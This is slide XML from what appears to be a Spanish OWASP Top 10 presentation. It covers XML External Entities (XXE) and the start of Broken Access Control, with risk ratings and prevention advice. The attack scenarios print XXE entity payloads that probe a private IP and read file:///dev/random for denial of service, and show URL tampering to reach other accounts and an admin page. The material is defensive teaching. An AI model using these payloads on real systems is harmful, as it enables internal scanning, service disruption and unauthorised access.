                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #2</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cambiando la línea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ENTITY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> anterior, un atacante puede escanear la red privada del servidor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY xxe SYSTEM "https://192.168.1.1/private"&gt;]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #3</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incluyendo un archivo potencialmente infinito, se intenta un ataque de denegación de servicio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &lt;!ENTITY xxe SYSTEM "file:///dev/random"&gt;]&gt;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Las aplicaciones y, en particular servicios web basados en XML, o integraciones que utilicen XML, pueden ser vulnerables a este ataque si:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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La aplicación acepta XML directamente, carga XML desde fuentes no confiables o inserta datos no confiables en documentos XML. Por último, estos datos son analizados sintácticamente por un procesador XML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Cualquiera de los procesadores XML utilizados en la aplicación o los servicios web basados en </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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>SOAP</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poseen habilitadas las </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hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>definiciones de tipo de documento (DTDs)</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Dado que los mecanismos exactos para deshabilitar el procesamiento de DTDs varía para cada procesador, se recomienda consultar la </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hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>hoja de trucos para prevención de XXE de OWASP</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171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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La aplicación utiliza </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hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>SAML</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para el procesamiento de identidades dentro de la seguridad federada o para propósitos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="870" i="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Single Sign-On (SSO)</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SAML utiliza XML para garantizar la identidad de los usuarios y puede ser vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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La aplicación utiliza SOAP en una versión previa a la 1.2 y, si las entidades XML son pasadas a la infraestructura SOAP, probablemente sea susceptible a ataques XXE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Ser vulnerable a ataques XXE significa que probablemente la aplicación también es vulnerable a ataques de denegación de servicio, incluyendo el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR"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hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>ataque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> Billion Laughs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="87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870" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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9"/>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endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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10"/>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a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-419" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Externos</a:t>
            </a:r>
            <a:endParaRPr lang="es-419" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId14"/>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7"/>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300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>El entrenamiento del desarrollador es esencial para identificar y mitigar defectos de XXE. Aparte de esto, prevenir XXE requiere:</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De ser posible, utilice formatos de datos menos complejos como JSON y evite la serialización de datos confidenciales.</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Actualice los procesadores y bibliotecas XML que utilice la aplicación o el sistema subyacente. Utilice validadores de dependencias. Actualice SOAP a  la versión 1.2 o superior.</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Deshabilite las entidades externas de XML y procesamiento DTD en todos los analizadores sintácticos XML en su aplicación, según se indica en la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>hoja de trucos para prevención de XXE de OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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Implemente validación de entrada positiva en el servidor (“lista blanca”), filtrado y sanitización para prevenir el ingreso de datos dañinos dentro de documentos, cabeceras y nodos XML.</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Verifique que la funcionalidad de carga de archivos XML o XSL valide el XML entrante, usando validación XSD o similar.</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Las herramientas SAST pueden ayudar a detectar XXE en el código fuente, aunque la revisión manual de código es la mejor alternativa en aplicaciones grandes y complejas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Si estos controles no son posibles, considere usar parcheo virtual, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="870" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>gateways</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de seguridad de API, o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>Firewalls de Aplicaciones Web (WAFs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> para detectar, monitorear y bloquear ataques XXE.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="87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A4</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t>Entidades Externas XML (XXE)</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0"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651385846"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="226188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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Explotabilidad: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalencia: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectabilidad: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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9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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Técnico: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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9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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Los atacantes pueden explotar procesadores XML vulnerables si cargan o incluyen contenido hostil en un documento XML, explotando código vulnerable, dependencias o integraciones.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="87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es-AR" sz="870" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>De forma predeterminada, muchos procesadores XML antiguos permiten la especificación de una entidad externa, una URI que se referencia y evalúa durante el procesamiento XML. Las herramientas </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId19"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> pueden descubrir estos problemas inspeccionando las dependencias y la configuración. Las herramientas </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId20"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> requieren pasos manuales adicionales para detectar y explotar estos problemas. Los </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" b="0" i="1" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>testers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> necesitan ser entrenados para hacer estas pruebas, ya que no eran realizadas antes de 2017.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="87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s-AR" sz="870" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Estos defectos se pueden utilizar para extraer datos, ejecutar una solicitud remota desde el servidor, escanear sistemas internos, realizar un ataque de denegación de servicio y ejecutar otro tipo de ataques.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>El impacto al negocio depende de las necesidades de la aplicación y de los datos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a: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200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #1</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la aplicación utiliza datos no validados en una llamada SQL para acceder a información de una cuenta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pstmt.setString(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter("acct")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ResultSet results = pstmt.executeQuery( );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Un atacante simplemente puede modificar el parámetro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“acct”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> en el navegador y enviar el número de cuenta que desee. Si no se verifica correctamente, el atacante puede acceder a la cuenta de cualquier usuario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>notmyacct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #2</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un atacante simplemente fuerza las búsquedas en las URL. Los privilegios de administrador son necesarios para acceder a la página de administración</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/app/getappInfo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin_getappInfo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
